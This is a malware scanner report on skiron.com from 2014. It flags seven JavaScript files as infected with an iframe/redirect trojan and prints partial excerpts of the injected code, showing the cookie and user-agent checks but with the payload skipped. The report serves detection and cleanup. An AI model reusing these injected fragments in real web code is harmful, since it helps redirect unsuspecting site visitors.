Malware Scanner report for skiron.com

Malicious/Suspicious/Total urls checked: 7/0/25

7 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/8

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://skiron.com/	200 OK Content-Length: 8052 Content-Type: text/html	clean
http://skiron.com/index.php/scripts/modernizr	200 OK Content-Length: 9575 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 \|\| pipka.indexOf("IEMobile") > -1 \|\| pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (! ... 3254 bytes are skipped ....onreadystatechange=k.onload=function(){!l&&g(k.readyState)&&(l=1,c(),k.onload=k.onreadystatechange=null)},m(function(){l\|\|(l=1,c(1))},e),i?k.onload():n.parentNode.insertBefore(k,n)},a.yepnope.injectCss=function(a,c,d,e,g,i){var e=b.createElement("link"),j,c=i?h:c\|\|f;e.href=a,e.rel="stylesheet",e.type="text/css";for(j in d)e.setAttribute(j,d[j]);g\|\|(n.parentNode.insertBefore(e,n),m(c,0))}}(this,document),Modernizr.load=function(){yepnope.apply(window,[].slice.call(arguments,0))}; Antivirus reports: Microsoft Trojan:JS/Iframe.DI Sophos Troj/JSRedir-OI
http://skiron.com/index.php/scripts/jquery.1.7.1.min	200 OK Content-Length: 94824 Content-Type: text/javascript	clean
http://skiron.com/index.php/scripts/jquery.queryloader	200 OK Content-Length: 3507 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 \|\| pipka.indexOf("IEMobile") > -1 \|\| pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (! ... 2232 bytes are skipped ...;div id='qLbar'></div>").css({height:c.barHeight+"px",marginTop:"-"+c.barHeight/2+"px",backgroundColor:c.barColor,width:"0%",position:"absolute",top:"50%"}).appendTo(e);!0==c.percentage&&(k=a("<div id='qLpercentage'></div>").text(c.loadingText+" 0%").css({height:"40px",width:"97%",position:"absolute",fontSize:"2em",top:"50%",right:"3%",marginTop:"-"+(59+c.barHeight)+ "px",textAlign:"right",marginLeft:"-50px",color:c.barColor}).appendTo(e));return this}})(jQuery); Antivirus reports: Microsoft Trojan:JS/Iframe.DI Sophos Troj/JSRedir-OI
http://skiron.com/index.php/scripts/sonic	200 OK Content-Length: 6607 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 \|\| pipka.indexOf("IEMobile") > -1 \|\| pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (! ... 3533 bytes are skipped ... }, iterateFrame: function() { this.frame += this.stepsPerFrame; if (this.frame >= this.points.length) { this.frame = 0; } }, play: function() { this.stopped = false; var hoc = this; this.timer = setInterval(function(){hoc.draw();}, 1000 / this.fps); }, stop: function() { this.stopped = true; this.timer && clearInterval(this.timer); } }; window.Sonic = Sonic; }()); Antivirus reports: Microsoft Trojan:JS/Iframe.DI Sophos Troj/JSRedir-OI
http://skiron.com/index.php/scripts/jquery.ui.1.8.18.min	200 OK Content-Length: 20157 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 \|\| pipka.indexOf("IEMobile") > -1 \|\| pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (! ... 3180 bytes are skipped ...earTimeout(c.rotation),c.rotation=setTimeout(function(){var a=d.selected;c.select(++a<c.anchors.length?a:0)},a),b&&b.stopPropagation()}),f=c._unrotate\|\|(c._unrotate=b?function(a){t=d.selected,e()}:function(a){a.clientX&&c.rotate(null)});a?(this.element.bind("tabsshow",e),this.anchors.bind(d.event+".tabs",f),e()):(clearTimeout(c.rotation),this.element.unbind("tabsshow",e),this.anchors.unbind(d.event+".tabs",f),delete this._rotate,delete this._unrotate);return this}})})(jQuery); Antivirus reports: Microsoft Trojan:JS/Iframe.DI Sophos Troj/JSRedir-OI
http://skiron.com/index.php/scripts/jquery.qtip.min	200 OK Content-Length: 33326 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 \|\| pipka.indexOf("IEMobile") > -1 \|\| pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (! ... 3231 bytes are skipped ...ction(a){var c=a.style,d;c&&"tip"in c&&(d=a.style.tip,typeof d!=="object"&&(a.style.tip={corner:d}),/string\|boolean/i.test(typeof d.corner)\|\|(d.corner=b),typeof d.width!=="number"&&delete d.width,typeof d.height!=="number"&&delete d.height,typeof d.border!=="number"&&d.border!==b&&delete d.border,typeof d.offset!=="number"&&delete d.offset)},a.extend(b,f.defaults,{style:{tip:{corner:b,mimic:c,width:6,height:6,border:b,offset:0}}})}) Antivirus reports: Microsoft Trojan:JS/Iframe.DI Sophos Troj/JSRedir-OI
http://skiron.com/index.php/scripts/jquery.cycle.min	200 OK Content-Length: 31989 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 \|\| pipka.indexOf("IEMobile") > -1 \|\| pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (! ... 3140 bytes are skipped ....display="block";var step=1,count=parseInt((opts.speedIn/13))-1;(function f(){var tt=t?t-parseInt(step(t/count)):0;var ll=l?l-parseInt(step(l/count)):0;var bb=b<h?b+parseInt(step((h-b)/count\|\|1)):h;var rr=r<w?r+parseInt(step((w-r)/count\|\|1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery); Antivirus reports: Microsoft Trojan:JS/Iframe.DI Sophos Troj/JSRedir-OI
http://skiron.com/index.php/scripts/scripts	200 OK Content-Length: 28507 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 \|\| pipka.indexOf("IEMobile") > -1 \|\| pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (! ... 3596 bytes are skipped ...'left', ($(window).outerWidth()/2)); $('#left, #leftHover').css('right', ($(window).outerWidth()/2)); $('#middle').css('right', ($(window).outerWidth()/2) - ($('#middle').outerWidth() /2)); $('#right, #rightHover').css('width', $(window).outerWidth()); $('#left, #leftHover').css('width', $(window).outerWidth()); if ($('#left .page .liste-description .description').length \|\| $('#right .page .liste-description .description').length) {heightPage()} } Antivirus reports: Microsoft Trojan:JS/Iframe.DI Sophos Troj/JSRedir-OI
http://use.typekit.com/vke4ftb.js	200 OK Content-Length: 32511 Content-Type: text/javascript	clean
http://skiron.com/index.php/medias/accueil/	HTTP/1.1 200 OK Connection: close Date: Mon, 15 Sep 2014 11:41:38 GMT Pragma: no-cache Server: nginx Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 11:41:38 GMT Set-Cookie: exp_last_visit=1095421298; expires=Tue, 15-Sep-2015 11:41:38 GMT; path=/ Set-Cookie: exp_last_activity=1410781298; expires=Tue, 15-Sep-2015 11:41:38 GMT; path=/ Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A14%3A%22medias%2Faccueil%22%3B%7D; path=/ X-Powered-By: PHP/5.3.28	clean
http://www.skiron.com/	200 OK Content-Length: 8052 Content-Type: text/html	clean
http://www.skiron.com/index.php/medias/accueil/	HTTP/1.1 200 OK Connection: close Date: Mon, 15 Sep 2014 11:41:39 GMT Pragma: no-cache Server: nginx Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 11:41:39 GMT Set-Cookie: exp_last_visit=1095421299; expires=Tue, 15-Sep-2015 11:41:39 GMT; path=/ Set-Cookie: exp_last_activity=1410781299; expires=Tue, 15-Sep-2015 11:41:39 GMT; path=/ Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A14%3A%22medias%2Faccueil%22%3B%7D; path=/ X-Powered-By: PHP/5.3.28	clean
http://www.skiron.com/test404page.js	404 Not Found Content-Length: 11 Content-Type: text/html	clean
http://skiron.com/index.php/medias/produits/	HTTP/1.1 200 OK Connection: close Date: Mon, 15 Sep 2014 11:41:40 GMT Pragma: no-cache Server: nginx Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 11:41:40 GMT Set-Cookie: exp_last_visit=1095421300; expires=Tue, 15-Sep-2015 11:41:40 GMT; path=/ Set-Cookie: exp_last_activity=1410781300; expires=Tue, 15-Sep-2015 11:41:40 GMT; path=/ Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22medias%2Fproduits%22%3B%7D; path=/ X-Powered-By: PHP/5.3.28	clean
http://skiron.com/index.php/medias/reseau/	HTTP/1.1 200 OK Connection: close Date: Mon, 15 Sep 2014 11:41:40 GMT Pragma: no-cache Server: nginx Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 11:41:40 GMT Set-Cookie: exp_last_visit=1095421300; expires=Tue, 15-Sep-2015 11:41:40 GMT; path=/ Set-Cookie: exp_last_activity=1410781300; expires=Tue, 15-Sep-2015 11:41:40 GMT; path=/ Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22medias%2Freseau%22%3B%7D; path=/ X-Powered-By: PHP/5.3.28	clean
http://skiron.com/index.php/medias/cible/	HTTP/1.1 200 OK Connection: close Date: Mon, 15 Sep 2014 11:41:41 GMT Pragma: no-cache Server: nginx Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 11:41:41 GMT Set-Cookie: exp_last_visit=1095421301; expires=Tue, 15-Sep-2015 11:41:41 GMT; path=/ Set-Cookie: exp_last_activity=1410781301; expires=Tue, 15-Sep-2015 11:41:41 GMT; path=/ Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22medias%2Fcible%22%3B%7D; path=/ X-Powered-By: PHP/5.3.28	clean
http://skiron.com/index.php/evenements/accueil/	HTTP/1.1 200 OK Connection: close Date: Mon, 15 Sep 2014 11:41:41 GMT Pragma: no-cache Server: nginx Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 11:41:41 GMT Set-Cookie: exp_last_visit=1095421301; expires=Tue, 15-Sep-2015 11:41:41 GMT; path=/ Set-Cookie: exp_last_activity=1410781301; expires=Tue, 15-Sep-2015 11:41:41 GMT; path=/ Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A18%3A%22evenements%2Faccueil%22%3B%7D; path=/ X-Powered-By: PHP/5.3.28	clean
http://skiron.com/index.php/evenements/methode/	HTTP/1.1 200 OK Connection: close Date: Mon, 15 Sep 2014 11:41:41 GMT Pragma: no-cache Server: nginx Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 11:41:41 GMT Set-Cookie: exp_last_visit=1095421301; expires=Tue, 15-Sep-2015 11:41:41 GMT; path=/ Set-Cookie: exp_last_activity=1410781301; expires=Tue, 15-Sep-2015 11:41:41 GMT; path=/ Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A18%3A%22evenements%2Fmethode%22%3B%7D; path=/ X-Powered-By: PHP/5.3.28	clean
http://skiron.com/index.php/evenements/cible/	HTTP/1.1 200 OK Connection: close Date: Mon, 15 Sep 2014 11:41:42 GMT Pragma: no-cache Server: nginx Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 11:41:42 GMT Set-Cookie: exp_last_visit=1095421302; expires=Tue, 15-Sep-2015 11:41:42 GMT; path=/ Set-Cookie: exp_last_activity=1410781302; expires=Tue, 15-Sep-2015 11:41:42 GMT; path=/ Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22evenements%2Fcible%22%3B%7D; path=/ X-Powered-By: PHP/5.3.28	clean
http://skiron.com/index.php/evenements/reseau/	HTTP/1.1 200 OK Connection: close Date: Mon, 15 Sep 2014 11:41:42 GMT Pragma: no-cache Server: nginx Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 11:41:42 GMT Set-Cookie: exp_last_visit=1095421302; expires=Tue, 15-Sep-2015 11:41:42 GMT; path=/ Set-Cookie: exp_last_activity=1410781302; expires=Tue, 15-Sep-2015 11:41:42 GMT; path=/ Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A17%3A%22evenements%2Freseau%22%3B%7D; path=/ X-Powered-By: PHP/5.3.28	clean
http://skiron.com/index.php/evenements/services/	HTTP/1.1 200 OK Connection: close Date: Mon, 15 Sep 2014 11:41:42 GMT Pragma: no-cache Server: nginx Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 11:41:42 GMT Set-Cookie: exp_last_visit=1095421302; expires=Tue, 15-Sep-2015 11:41:42 GMT; path=/ Set-Cookie: exp_last_activity=1410781302; expires=Tue, 15-Sep-2015 11:41:42 GMT; path=/ Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A19%3A%22evenements%2Fservices%22%3B%7D; path=/ X-Powered-By: PHP/5.3.28	clean
http://skiron.com/site/en	200 OK Content-Length: 8052 Content-Type: text/html	clean
http://skiron.com/site/	200 OK Content-Length: 8052 Content-Type: text/html	clean
http://skiron.com/site/fr	200 OK Content-Length: 8287 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: skiron.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 11:41:30 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 15 Sep 2014 11:41:30 GMT
Set-Cookie: exp_last_visit=1095421290; expires=Tue, 15-Sep-2015 11:41:30 GMT; path=/
Set-Cookie: exp_last_activity=1410781290; expires=Tue, 15-Sep-2015 11:41:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
X-Powered-By: PHP/5.3.28

Second query (visit from search engine):
GET / HTTP/1.1
Host: skiron.com
Referer: http://www.google.com/search?q=skiron.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=skiron.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://skiron.com/

Result: skiron.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for skiron.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools